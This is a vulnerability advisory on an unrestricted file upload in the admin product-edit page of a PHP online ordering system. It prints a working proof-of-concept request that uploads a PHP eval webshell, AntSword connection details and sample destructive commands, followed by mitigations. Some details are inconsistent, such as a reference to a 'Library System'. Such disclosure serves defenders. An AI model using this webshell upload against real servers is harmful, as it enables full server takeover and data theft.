code-projects Online Ordering System Project V1.0/admin/edit_product.php Unrestricted Upload

[zzb1388]

code-projects Online Ordering System Project V1.0/admin/edit_product.php Unrestricted Upload

Vulnerability Description

A critical file upload vulnerability exists in the /admin/edit_product.php file of Library System V1.0, allowing attackers to upload malicious PHP scripts (such as AntSword webshells) by bypassing file type and content validation. Once uploaded, attackers can use the AntSword client to establish a connection via formatted POST requests, enabling full control over the target system, including executing system commands, browsing the file system, and stealing sensitive data.

Affected Products

• Product Name: Online Ordering System
• Affected Version: V1.0
• Download Link:https://code-projects.org/online-ordering-system-in-php-with-source-code/

Technical Details

Root Cause

1. Inadequate File Upload Validation:
   The system fails to validate the image parameter uploaded via /admin/edit_product.php in the following ways:
   • No restriction on file extensions (allows executable scripts like .php, .php3);
   • No verification of MIME types (e.g., Content-Type can be forged as image/jpeg);
   • No content inspection (fails to detect PHP script signatures).
2. Accessible Upload Path:
   Uploaded files are stored in a web-accessible directory (e.g., /uploads/) without execution permission restrictions.

Attack Vector

1. Upload AntSword Webshell: Use a POST request to upload a PHP script with AntSword protocol;
2. Connect via AntSword Client: Interact with the webshell using encrypted POST requests to transmit commands;
3. Execute Remote Commands: Perform system commands and file operations through the AntSword interface.

POC (Proof of Concept)

1. POST Request Payload for Uploading AntSword Webshell

POST /OnlineOrderingSystem_PHP/onlineorderingsys/admin/edit_product.php?id=12 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------92661300142067782891941354941
Content-Length: 1080
Origin: http://127.0.0.1
Connection: keep-alive
Referer: http://127.0.0.1/OnlineOrderingSystem_PHP/onlineorderingsys/admin/edit_product.php?id=%3Cscript%3Ealert(xss)%3C/script%3E
Cookie: PHPSESSID=2v9rntr1vhkro9nuv5qf758jf5
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="name"

111111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="description"

111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="category"

Guitar
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="originated"

111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="price"

11
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="quantity"

111
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/octet-stream

<?php
@eval($_POST['shell']);

?>
-----------------------------92661300142067782891941354941
Content-Disposition: form-data; name="update"


-----------------------------92661300142067782891941354941--

2. Sample POST Request for AntSword Connection

POST /uploads/aj.php HTTP/1.1  
Host: example.com  
Content-Type: application/x-www-form-urlencoded  

a=ZXZhbCgkX1BPU1RbJ2MnXSk7  // Base64 decoded: eval($_POST['c']);  

3. AntSword Client Configuration

• URL: http://127.0.0.1/OnlineOrderingSystem_PHP/onlineorderingsys/admin/editproduct.php
• Password: shell (corresponds to $_POST['shell'] in the webshell)

Impact

1. Full System Control: Execute arbitrary system commands (e.g., cat /etc/passwd, rm -rf /);
2. Sensitive Data Theft: Access database config files (e.g., config.php) and user information;
3. Privilege Escalation & Lateral Movement: Exploit server vulnerabilities to escalate privileges or attack internal networks;
4. Persistence of Malicious Backdoors: Upload additional backdoors for long-term system control.

Mitigation

Immediate Fixes

1. Block Malicious Uploads

   :

   • Prohibit .php script uploads in web server configurations (e.g., Apache):

     <FilesMatch "\.(php|php3|php5|phtml)$">  
         Require all denied  
     </FilesMatch>  
     

2. Block AntSword-Specific Requests

   :

   • Add WAF rules to intercept uploads containing eval(base64_decode or POST parameters with a=ZXZ (AntSword's Base64 prefix).

Long-Term Solutions

1. Enhance File Upload Validation

   :

   • Whitelist Validation: Allow only image uploads (e.g., .jpg|.png) and verify real formats via getimagesize();
   • Content Inspection: Use fileinfo extension to check file magic numbers and prevent script disguising;
   • Random Rename: Store uploaded files with UUID names in non-web-accessible directories (e.g., /data/uploads/).

2. Restrict Directory Execution Permissions

   :

   • Set upload directories as non-executable (e.g., Nginx: location ~ \.php$ { deny all; }).

3. Monitor Anomalous Requests

   :

   • Log requests containing dangerous functions like eval and base64_decode;
   • Deploy EDR tools to monitor PHP file execution in web directories.

Proof of Concept Screenshots

1. AntSword webshell upload success

2. AntSword executing system commands

submiter：AlbaDove